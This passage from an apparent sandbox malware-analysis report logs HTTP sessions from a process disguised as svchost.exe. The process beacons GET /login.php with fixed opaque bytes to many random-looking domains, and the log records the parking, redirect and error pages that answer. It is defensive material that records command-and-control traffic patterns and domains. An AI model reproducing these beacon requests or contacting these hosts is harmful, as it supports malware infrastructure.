Aug 23, 2024 18:48:37.250704050 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:48:36 GMT content-type: text/html; charset=utf-8 content-length: 1226 x-request-id: 1595c5db-20e1-460e-a512-6d631153ed31 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ofiBZ6h3hwrwUvFR72pT7pjF+qMbRYNQt+Uqxar8EHy7OyLvsxnF9O7oa+hGKIBhRQkXZOx83tl5LwUsOcNj7w== set-cookie: parking_session=1595c5db-20e1-460e-a512-6d631153ed31; expires=Fri, 23 Aug 2024 17:03:37 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 66 69 42 5a 36 68 33 68 77 72 77 55 76 46 52 37 32 70 54 37 70 6a 46 2b 71 4d 62 52 59 4e 51 74 2b 55 71 78 61 72 38 45 48 79 37 4f 79 4c 76 73 78 6e 46 39 4f 37 6f 61 2b 68 47 4b 49 42 68 52 51 6b 58 5a 4f 78 38 33 74 6c 35 4c 77 55 73 4f 63 4e 6a 37 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ofiBZ6h3hwrwUvFR72pT7pjF+qMbRYNQt+Uqxar8EHy7OyLvsxnF9O7oa+hGKIBhRQkXZOx83tl5LwUsOcNj7w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Aug 23, 2024 18:48:37.254831076 CEST	867	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU5NWM1ZGItMjBlMS00NjBlLWE1MTItNmQ2MzExNTNlZDMxIiwicGFnZV90aW1lIjoxNzI0NDMxNzE3LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	64306	15.197.240.20	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:39.751919031 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50116	64.225.91.73	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:51.246264935 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:51.935988903 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:48:51 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50117	72.52.179.174	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:51.334958076 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50118	72.52.179.174	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:51.962806940 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50027	52.34.198.229	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:54.223489046 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431667\|1724431667\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:55.043040991 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431734\|1724431667\|33\|2\|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49517	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:56.443649054 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431669\|1724431669\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:56.952442884 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431736\|1724431669\|33\|2\|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	56383	162.255.119.102	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.479394913 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.323843956 CEST	303	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 55 Connection: keep-alive Location: http://www.gahyqah.com/login.php X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	56384	3.64.163.50	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.485250950 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.222850084 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:48:59.224190950 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.424563885 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	56385	188.114.96.3	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.559020996 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:00.143810987 CEST	793	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:49:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGm3hUdC7VhyMOsGnNm5sfFJOun67nH6JYbhOsNQmP4ppfpzdKuwjxSv%2FCdiBuXzh5lHftl6Hof%2B3bfFT5%2BFlTNONRRshVio7oBqrvaNCLC7A67FQySSv6rOZsMIxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c97e10b8b1a0f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:49:02.067445993 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:03.182677984 CEST	787	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:49:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://qegyhig.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHT4DWPliR79GKSqCkcvZWJSvcmKvlR%2FGiaugVqpltn9DTN5DJpjWk0VSdC2HBJJ1iuTTbpgoGhGMnrkKjCl7ixiGrgUvDUsh3z1WNvRgZFx4gF1eZbrIkuPVVdb5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c97f43d5c1a0f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	56386	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.655076981 CEST	374	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.232975006 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431739\|1724431621\|46\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	56387	18.208.156.248	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.665987015 CEST	374	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.226248026 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431739\|1724431621\|46\|3\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	56388	208.100.26.245	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.715660095 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.281402111 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:48:59.282566071 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.413589001 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 